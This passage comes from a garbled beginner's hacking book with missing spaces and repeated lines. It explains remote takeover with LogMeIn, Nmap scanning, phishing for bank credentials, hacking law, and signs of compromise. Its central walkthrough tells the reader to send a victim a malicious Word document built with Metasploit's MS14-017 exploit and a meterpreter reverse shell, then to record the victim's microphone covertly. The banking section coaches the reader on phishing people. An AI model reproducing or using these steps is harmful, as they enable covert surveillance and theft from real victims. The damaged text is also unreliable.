Thesecondmethodisusedtohackremotesandthefirststepinfollowingthis method of computer hacking is downloading and installing the LogMeIn software, they will give you a free limited version, this program should be downloadedonthecomputeryouintendtoremotelyview.Youhavetomakean accountontheLogMeInwebsitetousethefreeprogram.Whenyoualreadyown anaccountonthewebsite,loginandgotothe“MyComputers”pageincaseif itdoesn’topenautomaticallyafterloggingin.Thenextstepissearchingfor“ Add computer”, click on this button and put there the information of the computeryouintendtoaccessandthecomputershouldbeaddedautomatically. Checkifthecomputernameisaddedandclickonitifitisthere,ifnotthen repeatthebelowstep.Forthenextstepyouwillhavetoknowtheusernameand thepasswordofthecomputerinordertologonitandviewtheaccountyouwant toaccessandafterthatselectthe“RemoteControl”optionandlogoutthe websiteonceyousatisfiedyourcuriosity.

Computerhackersuseanothermethodtogetaccesstoyourcomputeranduseit.

ThewholeprocessisrealizedifhackersknowyourpersonalInternetProtocol

whichistotallyuniqueandanyhackercancontactyourcomputeriftheyknow

yourIP.ThefirststepinthiscaseisdownloadingandinstallingNmap,atool

usedforportscanningandafteryouhavegottheNmapinstalledyoushould

searchbyscanoptionalocalcomputerandafteryoudidthispleasescanyour

individualtarget,afterthescanyoushouldnoticetheopenports.Thelaststep

afterscanningisbannergrabbingandhereyoucanusetheregularol’telnet

client,TelnethasLinuxandmostWindowsdistributions:

telnet<hostIP><portbannertograb>andyoujusttriedthismethodaswell.

Hackers are creative minds and love to solve problems, one hacker asked himselfiftherewouldbenoproblemsandheendedupconcludingthathewould

commitsuicide,hackingissoaddictive,onceyougetitright,youneverleaveit.

commitsuicide,hackingissoaddictive,onceyougetitright,youneverleaveit.

AmassivecomputerhackwasmadebyAnonymousin2011whentheybroke

intotheSyrian Leader’saccountand accessedmorethan 78inboxesofthe president’spersonalandmadeitpublicandaccessibletoanyperson.According totheofficialsources,thehackersgroupdidn’tneedalotofefforttobreakthe emailbecausethepresident’spasswordisnumbertwoweakestpasswordinthe

worldonanofficialtop,hispasswordwas12345anditwasassociatedwitha

coupleofhisaccountsnotonlytheofficialone,whilethecountrywasonfire,

hotnewsappearedduetotheAnonymousgroupofhackers.

TheblackhathackerswhohavebiggoalssuchasAnonymousgoalthatlater turnedintoabigrealizationaremorethandangerousbecausebycontributing

withtheircreativemind,theyhave90%chancestosucceedbutthereis95%to

makeothercollateralvictimsofthehack,sothinktentimesbeforeyoutake

attitudeandactionasahackerbecauseyoumightdestroyotherpeoplelives

includingyourlifeaswell,onceyoutakeadecisionandyourealizewhatyou

decideyoucan’teraseyourownactions,it’sexactlyliveafamousmovie,once

isfilmeditisneverdeleted.

Asarealhacker,youshouldactwithresponsibilityandneverforgettoassume

everythingyoudo,evenifwearetalkingaboutwhitehathackingorblackhat

hacking,bothofthemrequestamaturecreativemind,notonlyacreativemind

becauselittlechildrenhavealsocreativeminds,buttheydon’tbecamehackers

inthemostofthecases.

Hackersdon’twantonlytohackyourcomputer,theyaredoingitbecausethey

wanttogetdeeplyinyourlife,sotheydecidetospyonyoubyhackingyour

computer.Duetothecomputertechnologyspyingisnotanymoreanactionthat

couldbeperformedonlybyagenciesandorganizationslike

CIA,NSA,and

KGBbecauseyoucandoittooifyouareadedicatedandmotivatedhacker.This

bookisgoingtotellyouhowtotransformanycomputerintoalisteningdevice.

 

StartbyinstallingKaliandafterthatcontinuebyfiringitup,youshouldbeable todiscreditthecomputerwantedinordertoconvertitintoalisteningdevice. Afterdoingthis,makesureyouarecompromisingtheRemoteComputerand oneofthegreatestwaytodoitisbysendingthecomputeranemailthatwillget thewantedclickonalinkordocumentandinsidethedocumentyoushould embedalistenerthatwillenableyoutoturnonthemicrophoneonthetarget computerandcollectalltheconversationsthataremadearoundthecomputer.To make sure you gain your victim’s attention please select an interesting and excitingsubjectthatwouldattractthevictimimmediately,yourmaingoalis earningthatmagicclick.

Youshouldassociatethisprocesswithalittlebitofsocialengineeringbecause inmostofthecases,hackersknowtheirvictimsandtheirweaknesssotakefull benefitandifit’syourbusinessrivalthensendhimanexceloraccessdocument, anythingthevictimmightmakeputinterestin.Hackersarejusttoosmartand busy with their stuff and that’s why they would never listen to foreign

conversationsbetweenunknownpeople.Youwillsearchforanexploitnext,you shouldfindacustomerwhousesthevulnerabilitiesofMicrosoftWord,afew timeagoMicrosoftpostedanofficialreportabouttheirvulnerabilitythatallow

remotecodeexecution,thefilewasnamedMS14-017andifyousearchtheweb

withattentionyouwillfindexploit/windows/fileformat/ms14_017_rtf,onceyou

foundthisyoushouldloaditintoMetaspoilt:

 

msf>useexploit/windows/fileformat/ms14_017_rtf

msfexploit(ms14_017_rtf) >

Afteryou’vegotitloadedwrite”info”tofindoutmoreinterestingstuff

Playloadinformation:

Space:375

Description:

This module creates a malicious RIF file that when opened in vulnerable versionsofMicrosoftWordwillleadtocodeexecution.

Theflawexistsinhowalistoverridecountfieldcanbemodifiedtotreatone structureasanother.Thisbugwasoriginallyseenbeingexploitedinthewild

startingApril2014.Thismodulewascreatedbyreversingapublicmalware

sample.

References:

afterthecomputerdisplaytheabove,selectshowoptions

msfexploit(ms14_017_rtf)>showoptions

Moduleoptions(exploit/windows//fileformat/ms14_017_rtf):

NameCurrentsettingRequiredDescription

------- --------------------------- ------------

FILENAMEmsf.rtfno Thefilename.

Exploittarget:

Id Name

---------

0Microsoftoffice2010SP2EnglishonWindows7SPIEnglish

YoumaynoticethatthisexploitworksonlyonMS2010,theinformationwe

needfromtheaboveisFILENAME.

Afterthat,createthefileyouwanttosendandthensetthepayloadrightinthe

documentbysendingthepayloadtometerpreterbecauseitletyoucontrolthe

hackedsystem.

msf>setPAYLOADwindows/meterpreter/reverse_tcp.

ThenextstepissettingupLHOSTwith your own IPaddress because it is

ThenextstepissettingupLHOSTwith your own IPaddress because it is helpingyoutogetnotifiedwhenthesystemisusedbyyourvictim,endthisstep bywriting"exploit."Thiswillcreateafilethatplacesthemeterpreteronthe

victim’ssystem.

bywriting"exploit."Thiswillcreateafilethatplacesthemeterpreteronthe victim’ssystem.

Toreceivetheconnectionbacktoyoursystemyoumustopenamulti-handler

connection

msf>useexploit/multi/handler

msf>setPAYLOADwindows/meterpreter/reverse_tcp

AfterthissteppleasesettheLHOSTtoyourinternetprotocol.

Onceyoucreatedyourmaliciousfilesendittoyourvictimandwaituntilit’s

openedbythevictimontheirsystem.Afterthevictimopenthedocumentsheis

goingtopassameterpretersession.

UsetheMetasploitRubyscriptthatactivatesthemicrophoneonthehacked computer and form the meterpreter prompt like this

UsetheMetasploitRubyscriptthatactivatesthemicrophoneonthehacked computer and form the meterpreter prompt like this meterpreter > run

sound_recorder-l/root.

computer and form the meterpreter prompt like this meterpreter > run sound_recorder-l/root.

Youcanfindtherecordingsatyoursystemina/root

directoryinafile.

Theworstpartaboutthismethodisthatistakingahugeamountofmemory,so

makesureyouprepareyourhardwarefortheoperationaswell.

Andbecausehackersarehelpingtechnologytogoon,therearepersonswho

takecareofthehackers,sotheycreatedmanysiteswheretheoldhackerscan

exercisetheirskillsandbeginnerstolearnfewthingsabouthacking

Hackthissite!,theyareofferingtrainingmaterialsandabigrangeoftipsand tricksforhackers,butthosekindsofsiteswon’tmakeyouamasterinhacking butyoucandefinitelybecomeonebytryingtoworkonthebiggestproblems and a great way to challenge your mind is searching for those kind of impossible,unsolvedproblemsandtryingtofindasolutionforeachofthem.

Computerhackinghasitslegallimitstoo,it’soktodowhatyoulikeandtry

everythinginthatdomainuntilyouareinprison,sowhilehackingadrenalineis

freakingyououtdon’tforgetthattherearepeoplewhocan’twaittojudgeyour

actions.

Theproblemsyouwillmeetinhackingareactuallyareflectionofrealproblems

inthereallife,andrealproblemsinlifeshouldbetreatedwithfullseriousness,

attention,responsibilityandalotofknowledge,it’sthesameprocedureincase

ofhacking,youcan’thackjustforfunforalongperiodoftimebecauseby

doingityouincreaseyourchancestogeta“freetrial”inthefederalprisonand

thiswouldbeunlikabletoanyhackerbecausewithoutfreedomyoucan’tdo

yourstuff,youcan’taccessyourmaterialsandsomepeoplearecontrollingyour

life,sotakecaretoNOTarriveatthatpoint.

OnlineBankingHacking

Afteryoulearnedaboutdifferenttypesofhacking,thereisalastonetotakein

considerationandthattypeofhackingiscalledInternetBankingHackingand

it’sconsideredacybercrimeinthemostcountriesoftheworld.

Inthelastyears,internetbankinghasbecomeafeatureusedbyabignumberof peopleandithasitsadvantages,butthemaindisadvantageisthatoncehackers get into this type of hacking all the money are lost. Authorities and expert analysesestimatethatinthefutureyearsthecasesofonlinebankinghacking will take a considerable growth. Online banking exists since 1980 and new methodstohackonlinebankaccountsareappearingeveryday.Thisbookwill tell you the fundamental methods used in online banking hacking since it appeared.

Thefirstmethodyoucanchooseforhackinganonlinebankaccountisphishing,

thenumberofthiskindofattacksaregrowinginthelastyearsagainstbanking

systems,tohackthevictimyoushouldusesocialengineeringtechniquesaswell.

Hackershideunderabankidentityandmaketheirnewidentitylookasrealas

possiblepretendingtobelongtothebank,maliciousemails,advertisementsand

emailsarethetopsecretingettingintosomeone’sbankaccountwithouttheir

permissionorknowledge.

You should adopt the typical phishing scheme and try to collect as much informationasyoucanaboutyourvictim,beforeanythingelseyoushouldknow theiremailaddressandifthevictimusesthisaddressforonlinebankingbut don’tworry,mostofthepeopledoitbecauseit’salittlebittoocomplicatedto workoncoupleemailsatatimeandpeoplewhochooseinternetbankingare usuallybusyandtheydon’thavetimetofollowmorethananemailaddress.

So, after you have got the email address, send any email that can getyour victim’s attention by opening that email, the content of the email can be somethinginterestingorinthiscaseit’sbettertoguideyourvictimthoughalink toaspecializedwebsitethatwillaskforfinancialdataandsecuritydetails,those kindofwebsitesarespeciallydesignedtolooklikeanofficialbankaccount,but isdefinitelynottheoriginalone,thoseinfectedwebsitesaredesignedidentical totheoriginalones.

Youremailshouldmakethevictimclickonalinkwhichwillguideyourvictim

toawebsitewhichperfectlyreplicatesabanksite.

Hackersalsoincludeintheemailattachmentswhichcontainthelinktothefake

websiteandonceopenedithasthesameeffect.Phishingemailsshouldtakethe

officialformofnotificationsandemailsofthebanks,organizationsor

e-payment

systems,thosekindsofmessagesrequestyourvictim’ssensitiveinformationthat

willhelpyoureachyourgoal.Malwarespeciallydesignedforonlinebanking

hackingexist!it’snamedPrgBankingTrojan.

McAfeehaspublishedareportonphishingwhichindicatesthathackersaren’t hackingsmallbanks,theirtargetsarebigcompanies,banksandorganizationthat

couldworththehackoperationtobedone.37%ofallbanksontheglobewere

hackedusingthephishingmethodinthelast12mothsatleastonce.

Hackers attempt to every sector by phishing it. Hackers are interested in predominantlybanking,e-paymentsystems,e-auctionsandgenerallyinhacking bigfinancialorganizationsaroundtheglobe.

Phishersarefocusedonbreakingintohostingprovidersandtheysucceedin

mostofthecases,hackersdisgracingserversandupdatetheirownconfiguration

inordertodisplayphishingpagesfromaprivatesubdirectoryofeachdomain

thatthemachinehost.

Don’tforgettoprotectyourselfevenifyouaretryingtohackonlineaccounts,

withalittlelackofattentionyoucanlooseeverythingaswellasyourvictims.

Don’tdivulgeyourInternetProtocol,readcarefullyeveryemailanddon’tclick

unlessyouaresure,askandrequestmoreinformationalwaysinordertokeep

protected.

Thesecondmethodusedbyhackerstobreakintoonlinebankingaccountsis

calledWateringHoleandspecialistsdefineitasanevolutionofphishingattacks.

Bychoosingthisoptionhackersareinjectingmaliciouscodesontoapublic

websitevisitedbyasmallandstandardgroupofpeople.

In Watering Hole attack, hackers wait for target people to visit the hacked websiteandtheyarenotinvitingtheirvictimstodoit,theyareonlywaitingfor themtovisitthewebsite.Ifyouchoosethismethod,youshoulduseInternet ExplorerandAdobeFlashPlayer.

Hackersarecompromisingwebsitesusingthismethodthataren’tupdatedand configured very frequent because they are easily to hack than an updated website,usuallyhackersareusingtheexploitkitstheyfindontheblacksquare.

Prohackershackthewebsiteatleastsixmonthsbeforetheyattackit.

Thismethodisveryefficientbecausehackersandwebsitescanbelocatedvery

hardcomparativelytophishingattacks.Aftertheattackshackerskeepintouch

withthewebsitetomakesurethateverythingisgoinginthedirectiontheywant

to.

In2012,hackersusedthismethodtohackaregionalbankinMassachusetts.The

operationwassuccessfulduetotheJavaScriptelementsonbothsites,thebank in Massachusetts and the local government that was under Washington DC suburbs:

Hxxp://www.xxxxxxxxtrust.com

Hxxp://xxxxxxcountrymd.gov

AnotherattackusingthismethodwasdiscoveredinMarch2013whenmany

banksinSouthKoreawerecompromised,thehackerscollectedsensitivedata

fromthebankandtheyhavealsoshutdowntheirsystem.Aninterruptionof

theirserviceswasmadeontheironlinebanking.

Hackersconsiderthismethodasolutionfortheproblemsthatauthoritiesand security services and systems give them, and because they love to solve

problems,theyfoundaninnovativesolutioninthiscaseaswell.

Researchesshowthatmostofthehackersmakemoneyonlineusingthismethod

andalotofthemarestillundetected.

Hackershavealotofideasandtheyarereallygood,theirideasreflectintheir

solutionsandthat’showPharmingandCreditCardRedirectionhackmethod

wasborn.

Thismethodconsistsinhijackingabank’sURLandwhenthecustomersaccess

ittheyareautomaticallyguidedtoanothersitewhichisidenticaltotheoriginal

website.Thismethodofhackingisalittlebitmoredifficultthantheothertwo

methods,butnotimpossible.Youcantechnicallymakeitwithoneofthenext

techniques:

1.

DNSCachePoisoning

DNS’sexistinabank’s,organization’sorcompany’snetworktomakea

betterresponseperformance.HackersattacktheDNSserverbyexploring

vulnerabilitiesintheDNSsoftware,whichmaketheservertogiveanerror

becauseitwillincorrectlyvalidatetheDNSresponse.

Theserverwillredirectpeopletoanothersitebecauseitwillcatchwrongall

theentries.Usually,theserverwhichwillhostthevictimsismanagedand

controlledbyhackersinordertogivethecustomersmalware.Hackerscan

evenattackcustomersiftheyprovidethehackerstheirIP.

1.

HostsFileModification

Hostsfileisusedbyhackerstodirectthecustomersonanywebsiteunder

theircontrol.

Anew technique is Credit card redirection which is used on disgraceful e- commercewebsitestoletthehackersgetthesensitiveinformationtheyneed.

Thistechniqueisnothackingthecustomerdirectly,afterthevictimpaysusing

thecard,thehackermodifytheflowoftheoperationandallthemoneyare

redirectedtothemandmostoftheattacksaremadeonwebsitesthatoffere-

commerceservices.

Hackers also break into a victim’s account by changing the credit card processingfile.

AnothertypeofattacksusedinonlinebankinghackingiscalledMalwarebased

attacksandtheyareclassifiedasthemostdangerousattacksontheinternet

relatedtoonlinebankingservices.

Therearemanymaliciouscategoriesbutingeneraltheyaredesignedtohitthe

onlinefinancialbusiness.

Security community considers Zeus, Carberp and Spyeye are considered the mostdangerousofall.ZeusisinfactaTrojanhorsewhichbestworksonallthe

versionsofWindows,itwasfirstdiscoveredin2007whenhackersuseitto

obtain illegally information about US Department of Transportation, it’s the

oldestonefromthosethreeandevenNASAgothackedin2009usingZeus.

MIITBismaybethemostefficientmethodusedbyhackersininternetbanking wheretheoneswhowanttoattackcombinesocialengineeringwithmalware whichisinfectingthebrowserofthevictim.Itmostlyhideundertheformof BHO(BrowserHelperObject),attacksarebasedonproxieswhichinfectthe browser of the customer exploring it’s weakness on the victim’s device. Maliciouscodesareabletochangethecontentofanonlinetransactionbetween thebankandthecustomer.

TheZeusTrojanisalsousedtohackandgetbankcredentialsbyMIITkeystroke logging.SpecialistsconsiderthatninemillionphishingemailswithZeuswere

sentin2009.

AccordingtoZeusTrackerUSA,Deutschland,Russia,UK,Ukraine,Romania,

Netherlands,France,JapanandTurkeyaretoptencountrieswhicharehosting

Zeus.

HoT-HandonThiefisanotherTrojanspeciallydesignedtohackonlinebanking, it was created to hit the Linux and Mac systems which demonstrated to be immune to malware. Authorities say that it was created in Russia and it’s availabletobuyonsomeRussianundergroundforums,it’scapableofinfecting thevictimsandstealingsensitiveinformationfromtheirmachines.

GrabbersandbackdoorinfectionvectorsarecurrentlyonsalewithHandof

Thiefforapproximately$3000.

DDoSattacksarealsousedtohackinternetbanking.Incaseofonlinebanking hacking,hackersarehelpedbyvolunteersthatparticipateintheoperation,a botnet is easier to detect and volunteers can block the whole process of detecting.

After129countrieshavebeenattackedwithDDoSattacks,FBIdecidestoshare

alistofmorethan130.000InternetProtocoladdressesusedinattacks,attacks

wherethevictimscouldnotaccesstheironlineormobilebankingservices.

ThefundamentaltypesofDDoSattacks:

TheonesbasedonvolumeVBA-thehackerismakinganinundationwithbig

quantityofdataonthesite.

ProtocolAttacksPA-whenthehackersaretryingtoimbuethetargetserversby

exploitingnetworkprotocolfailures.

LayerSevenAttacks-createdtoexhausttheresourcelimitswhenhackersmake inundations with huge amounts of HTTP requests that saturate a target’s resources.

DDoSattacksarealsousedasadeflectiontohidetheresultsofanattackthatis ongoing.DirtJumperisapartofDDoSmalwaregroupandithasanupdated versioncalledPandora,abignumberofDDoSkitshaveshownuplikeYZF, ArmageddoN and DiWar. FBI and FS-ISAC and IC3 are highlighting the distributionofDirtJumperkitbeingusedinbankattacks.

Usingthemethodsfromabove,hackerscangetmoneyandtheyarealsocalled

criminalcyberiftheydothisactivityillegally,theycanhackanultimatenumber

ofaccountandbanksuntiltheyarediscovered,iftheyareeverdiscovered.

Nowmorethanever,hackersdon’tfocusonlyoncomputers,theyalsotakein considerationhackingthemobilephoneswhicharetodaysuchanresultofgreat ideascombinedwithhardwork,sincethephonesaresmartphonestheyallow youtodoanykindofoperationyouwantorneedandtheyarewaymoreused nowadaysthancomputers,alotofpeopleusetheirsmartphonetopaybills onlineortodotransactionsonlineviainternetbankingservicesallaroundthe worldandthat’swhyhackersarefocusingalsoonsmartphonesandhacking their systems in order to reach a new goal or just to give themselves new

challenges.Aresearchdonein2015highlightstheimportanceofsmartphones

andshowsusthatsmartphonesaremoreusednowadaysthencomputers.

CHAPTER4:HACKINGANDNON-HACKING

HackersandtheLaw

Everythinginthislifehasitsownlimitsandconsequences,youcan’teatwithout

stoppingandgettingfat,youcan’tdriveyourcarwithoutstoppingandgiving

herfuel,youcan’tjumpfreefromaplanewithoutaparachuteandnotgetting

hurtandyoucan’thackforeverexceptifyouaredoingethicalhacking.Butdo

youknowhowfaryoushouldgo?!

The main problem is that government agents aren’t making the difference betweenthetwotypesofhackers,soifyouarebasicallycurioustotestyour skillsonasystemyoucanwinuptotwentyyearsinprisonjustlikeblackhat hackerswhoarespyingontheinternet,hackingimportantsystemsandhaveevil goals.

Orworstthanthat,therewillbenodifferencebetweenyouandapersonwhohas

killedorabusedothermembersofthesociety.

In general, governments aren’t paying too much attention for hackers, a nightmareforthegovernmentisrepresentedbysmarthackerswhocouldnotbe detectedanddoitjustforamusementandbecausetheyarepassionate,soifyou areablackhathackeryoushouldhaveintelligenceandspeedreactioninorder tostayundercoverforever.Governmentcarelessnessaboutthosewhohelpthem sometimes improve their systems is brightly reflecting in the laws that governmentisimputingnomatterinwhichcountryontheglobe.Let’stakeas anexampleUnitedStatesofAmericabecausetheyareatthemomentthebiggest political,economicalandsocialpowerintheworld.

InUnitedStatesofAmericatherearemanylawsthatarebanninghackingjust

like18U.S.C.§1029whichfocusesoncreation,divisionanduseofcodesand

machinesthatgivehackerillegalaccesstoacomputersystem.Thelanguageof

thelawisincompleteandunfairbecauseitismakingreferenceonlytocreating

andusingamachinewithabadintention,butitdoesnotmakeanyspecification

abouttesting,learningandunderstandingsystems.

Ifwetakeacloserlooktothelaws,wecanalsofindanotherinterestinglawin U.S Department of Justice which is 18 U.S.C. § 1030, this law is banning unauthorized access to government machines. The law is considered broken evenifthehackeronlyenteredthesystemwithoutdoinganythingelse.

Thereisabigrangeofpenaltiesgoingfrombigconsiderablefinstoyearsto spend in the jail. Officials consider that minor hacking actions deserve punishmentstartingwithsixmonthswhilebiggeractionsofhackingandattacks cantakeuptotwentyyearsinprison,theymainlyfocusonthedamagesmadeby thehackerbutdoesnotanyonethinkaboutthemoneyspentonthehacker’slife inprison?

Let’sanalyzeanothercountry,let’stakeasanexampleaEuropeancountrylike

Germany(Deutschland)whichhassimilarlawsincomparisonwithUSA.There

isalawinGermanythatisbanningevenpossessionofhackingtoolsandevenif

youneveropenorusethem,onceyouarediscoveredyoucan’tescape.The

nationiscomplainingaboutthislawbecausemanyapplicationsfallunderthe

definitionofhackingtoolsanditisaninfractionunderthislawiforganizations

orcompanieshiresomehackerstochecktheirsystemweaknessandflaws.

Believeitornot,Germanyhasadoptedanewlawin2007whichisgoingway

toofarbecauseevenifyougoinacomputerstoleandaskthesellertogiveyou

acomputerbecauseyouwanttostarthackingevenifyouarekiddingyouwill

getarrestedifofficialshearaboutyourjoke,morethanthat,iftheyouwillbuy

thecomputerfromthesellerhewillbearrestedtoo,don’tjoketoomuchifyou

gotoGermany,youneverknowwhenyoucouldbeconsideredwrong.

TravelingtoAfrica,thesituationisalittlebitmoredifferent,inSaudiArabiafor exampleit’sconsideredalawdeviationifyouhaveafalsenameinahacking

operationaccordingtoArticle4oftheirBasicLawofGovernance.Anotherlaw

goingtoofarinthesamecountryisaboutassistingtosuchanoperationandnot tellingtheofficialsabouttheoperation;evenifyouarewatchingyourfriend how he is testing a system and you aren’t telling the officials about it it’s consideredacybercrime.

TakingalookatthesituationinAsia,lawsarealittlebittoopermissiveinChina andmaybethat’swhytheyareinthefirstplaceathackingintheworldbut official sources say that the situation will change in the future because the government is taking care of this problem and they are formulating new measuresforhackinganditsadepts.

TopTencountriesinhackingputsUnitedStatesonthesecondplaceafterChina,

followedbyTurkey,RussianFederation,Taiwan,Brazil,Romania,India,Italy

andHungary.

allthelawsabouthackinginyourcountry,becarefulallthetimeaboutwhatare

yousayingandtowhomyouaresaying.

Legalityoffersyouasagiftyourfreedom,thisgiftisverypreciousanditiseven

morepreciousthanyourpassionbecausethosetwothingsgohandbyhand,you

cannottakefulladvantageofyourpassioninprisonwheremostlikelyifyou’re

ahackertheywillbanaccesstoacomputerinyourcase.

Giveaspecialattentiontothelaws,becauseevenifyouthinkthattheyarevery

unfairyoucannotavoidthemandintheendyouareunderyourcountry’slaws

sopleasemakesureyouwillnotbreakthem.Hackingoperationsareasensible

subjectforeverycountryandthebigproblemintheworldisthatpeoplewho

makethelawsarenotinknowledgeofeverythingaboutadomainandthat’swhy

sometimeswearesupposedtorespectlawsthataremakingnosense.

HowdoHackersAffectOurLives

According to Newton’s Third Law, for every action there is an equal and oppositereactionandthisisjustsotrue.Everythingwemakehasaneffectbut sometimeswedonotnoticetheeffectorevenrealizethereisgoingtobean effect,butsomeofussimplyignoretheeffectsoftheiractions.

Hackinghasitseffectstooasanyotheraction;thereareeffectsonindividuals,

organizationsandonsocietyingeneral.

Let’sseetheeffectsoneverylevelstartingwiththeeffectsofhackingonan

organization.Itdependsofcourseonthehacker’sgoalbutgenerallyhackingis

bigcompaniesandorganizationsworstenemiesbecausetheycancausehuge

damagesintotheireconomy.

Forexample,in2003-2004UnitedKingdomhaspaidduetocomputerhacking

billionsofpoundsinordertosolvetheirproblems.ABBCarticlerelatesthat

virusesdesignedbyhackersmadeadamageof$55billionaroundtheworldin

2003inbusinessesdomain.In2011,Sonyhaspaidfromitspocketaround$170

millionbecausetheyhavegottheirPlayStationhackedinasingleshot,atthe

sametimeGooglehaspaidaroundahalfmilliondollarsdueto“middlesized”

hackingoperations.RichardPowersaysthatdueonehackingsessioncompanies

andorganizationscanpayuptosevenmilliondollarinonesingleday.

Despitethefinancialside,thereisaneffectontheorganizationsandcompanies

information;mostofthehackerssearchinsteadofcashmoneysomevaluable

informationsuchasplans,researches,strategiesandreports.Onlinedatabases

canbeahacker’sgoalaswellasreports,theymightwanttoobtainaddresses,

phonenumbersoremails,suchanattackonasmallcompanywouldcostthem

morethanthecompanyitself.

Some hackers try to affect the organizational structure of a company by modifyingitorstealingfromittheelementstheywanttobutthiskindofattack isreallydifficulttorealizebecausemostofthecompaniesemployspecializedIT teams that are always working on updating, creating and civilizing security systemstopreventhacking.

Hackingaffectsalsothecomputerandtechnologyindustrybuttheindustrymay

takebenefitfromhackingiftheyknowhowtoredirectthesituationintheir

favor.

Privatecompanieswhicharespecializingoncreatingsecuritysystemsmayuse

hackingasakeytotheirsuccess.

Morethanthat,companiespreferpreventionnotcuresotheymightinvesthuge

quantitiesofmoneyonsecuritysystemsandwhynothardwarebecausethereare

hackswhichcanbepossibleonlymodifyingthehardware.

Onceweknowtheeffectsonthislevel,wecanmovetoanotherlevelwhichwill

behackingeffectsonsociety.

Onlyanexampleofhackingcangetsocietycrazyandmakeitsmembersspend

bigmoneyonbettersoftware,whichisnotabadthingbecauseabettersoftware

meansalwaysabetterlife.

Hackingiscausingmoneylosshereaswellbecausesocietymembersaren’t alwaysgoodinformedaboutmalwareandwhatcouldmalwaredosotheyare happywhentheyreceiveanemailthatispromisingthemmillionsofdollarsif they gave their personal information. Social engineering is affecting this categoryinaveryintensemodebecausemalwareandsocialengineeringarelike therelationshipbetweenyourhandsandyoureyeswhenyouarecrying;you alwaysremoveyourtearswithyourhands.

So,hackersareresponsiblebothforexcellentandawfuleffectsonthesociety.

AsaneffectofWhiteHathackersweownbasicssuchastheFreeSoftware Foundationthathavefinisheditpossibleforcomputeradeptstoexercise,learn, copy,adjust,andreorganizecomputerprogramswithoutpayingforit.GreyHat hackers have also had helpful impacts on society by running to find vulnerabilitiesintraditionalsoftwareproductswiththeintentionsofnotifying

thecreatorsanddesignerssotheycansecurethetroublesbeforeaBlackHat

hackercancomealonganddeveloptheerror.

Thesocietygotaffectedin2002whenacyberterrrormovementwasstartedbya

groupofhackersnamedEl8againstawhitehackersgroupknownasProject

Mayhem.Thecampaign’sgoalwascausingachaosaroundtheglobeby

destroyingtheinfrastructureofsecuritysystemsmanufacturing.

Thisisnoteverything,thereisonemoreeffectandthateffectisonindividuals. Hackerscanlooseeverythingstartingfromtheirlifefundsandtransformtheir financialsituationbybringingitunderground.Asahackeryouhavetowork withpeopleandinvestalotoftimeinthisbylisteningtoeveryone’sproblems andtryingtosolvethem,theproblemisnotthis,theproblemisthatpeopledo notunderstandwhatyouaretryingtoexplainbecausefewpeoplehaveabasein hacking and explaining the situation to them can bring your nerves down. Anothereffectgainedbyhackersisthefinancialone,onlypassionatehackers makevirusesanddiscovernewtechniquestohackforfree,therestareusing hackingasamachinetogetmoneybecausetheygetinformationandsellitlater ortheycancreateandsendvirusesspeciallyformoney.

Also,byhackingtheycanrisktheirfreedomandthat’stheworstthingfromall

theabove.

Ineachcase,hackingaffectbadlyreputation,itaffectsthehacker’sreputation, theorganization’sreputationandthesociety’sreputationaswellandthat’show hackingcandamageeffectivelythereputationandusuallythemostaffectedare thebigcompaniesandorganizationsbecauseiftheyarehackedafewtimesina

shorttimetheycanloseupto50%fromtheircustomers.

Hackingalsohasanimpactonthecomputersanditcanaffectcomputersintwo

ways:affectingthesoftwareandaffectingthehardware,bothcanbedestroyedif

thehackerisskilledandthecouldbeneverbroughtbackinsomecases,butin

othercasesthedamageisnottoobigandownerscanuseitagainafterthehack.

HowtoKnowifYou’reHacked

Eachoneofuscanbeavictimofsomeone’shack,thefirststepinsaving

yourselfisknowingthatyouarehackedandafterthatgotoaspecialisttomake

surethatyourproblemexistandtofindasolutionasfastaspossible.Buthow

doyouknowyouhavebeenhacked?

steps:
steps:

Whoknowsyourcomputerbetterthanyoudo?Noone,sopleasetakeaclose general look and spot if there is something that goes wrong such as your computerspeed,filesloss,thecomputerisnotrecognizingyourpasswordand you cannot open programs, surprise! Some programs you didn’t install, it’s connectingtotheinternetautomaticallyevenifyoudidnotactivatethisoption, fileshavesufferedchangesandifyouhaveaprinteritwayactstrangely.

Thenextstepisgoingonlineseeifyoucanaccessallthewebsiteswithyour

passwordandifyoucanthenthatisagoodsignbutifwhenyougoonlineyour

searchesareredirectedtoanotherpages/sitesandiftherewillbornnewextra

browserscreensthenIdon’thavethebestnewsforyou.

Youcanturnsuspiciousandgetworriediftherearemultipletoolbarsonyour browser, this is an important sign that you have been hacked also if your antivirussoftwareisnotworkingandifyoureceivefakevirusmessagesyou might be hacked. Visible signs of hacking are some bills you get without purchasinganythingandcheckyoursentsectionintheemailtoseeifthereare someemailssentexcepttheonesyousent,sometimesthefakeemailsdonot appearonthevictim’sscreenbuttomakesurecallafriendandaskforthelast emailsendbyyouoranystrangeemailreceivedfromyou.

Googleyourself!Thishelpsalotinfindingoutifyouarehacked,seeifthereare

anytoopersonalinformationthatyouhavenotmadepublic.

Hackersusuallyfullycontrolyourmachineiftheywant,soifthingsaregoing crazyandthesituationisnomoreunderyourcontrolthenyouaremanipulated

byanotherperson100%.

Thesecondpart:whatyoumustdoifyourecognizedanysignsoftheabove

Firstofall,throwawayyourinternetconnectionanddisconnectasfastasyou

canbecauseinthiswayifthereissomeonecontrollingyourcomputertheywill

immediatelylosetheconectionwithyou,don’tforgettoplugouttheroutertoo.

So,rightnowyouarefullyundermissionandyoushouldpaymoreattention

fromnowon,tocontinuestartupyourcomputerandbootitinsafemodemake

sureitisdisconnectedcompletelyandusesafemodefromyourcomputerto

reopenit.

open.Ifyouarefindingnewstrangeprogramsyoudidnotinstall,uninstallitbut ifyoudonotknowhowcallacomputercenterserviceandbringaspecialist uninstalltheprogramsforyou.Thenextstepyoushouldfollowisscanningyour computer,doasweepusingananti-viruslikeAvira,AVGorAvastanddon’t forgettorequesthelpifyouareunsureaboutthis.Ifthetestendsupwith nothing please back up the files you consider important and after that do a completesystemrestoreandmakesureyougetthelatestupdates.

Ifyouhavebeenanonlinebankinghackingvictim,takeyourphoneandalertthe

bank!Contactthemtoexplainthesituationandtostoreyouraccounts,agood

ideaistorequestsomeadvicesforthefutureaboutfundsprotection.

Andthelaststepistoalertallthepeoplethathaveyouremailandletthemknow

aboutyourproblembutdonotgivetoopersonaldetails,makesureyouclearly

explainwhatishidingbehindtheemailsfromyouandmakethemdeletethe

emailandtonotfollowanylinksorsuspiciousmaterial,askthemiftheyalready

diditandiftheydidithelpthemprotecttheircomputerandactinthewayyou

justactedinyourcase,let’sgivehelpifwecan.

Somepeoplelivetheirwholelifewithoutknowingtheyarehacked,andmostof

